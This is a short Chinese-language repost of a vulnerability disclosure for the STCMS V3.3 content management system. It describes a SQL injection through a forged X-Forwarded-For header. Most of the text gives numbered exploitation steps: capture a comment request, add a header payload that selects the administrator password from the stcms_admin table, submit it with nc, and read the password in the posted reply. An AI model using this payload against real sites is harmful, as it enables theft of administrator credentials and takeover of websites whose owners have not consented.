作者:狮子座YAO | 来源:互联网 | 2017-11-12 22:44
STCMSV3.3暴管理员密码0DAY漏洞,STCMSV3.3漏洞影响版本:STCMSV3.3STCMSV3.3漏洞产生原因:没有过滤$_SERVER,导致用户可以伪造$_SERVER[X-FORWARDED-FOR],从而将恶意注射语句写入数据库中。
STCMS V3.3 漏洞发布日期:2010-05.25
STCMS V3.3 漏洞发布作者:子仪
STCMS V3.3 漏洞影响版本:STCMS V3.3
官方地址: http://www.phpstcms.com/
描述:
STCMS V3.3 漏洞产生原因:
没有过滤$_SERVER,导致用户可以伪造$_SERVER[X-FORWARDED-FOR],从而将恶意注射语句写入数据库
中。
.利用步骤:
1. 进入有评论的页面,先评论一个并抓包。
2. 在包中添加一条:
X-Forwarded-For: 127.0.0.1',(select pwd from stcms_admin where id =1))#并保存
3. NC提交
4. 此时又添加了一条留言,并且多了一个回复,内容就是管理员的密码。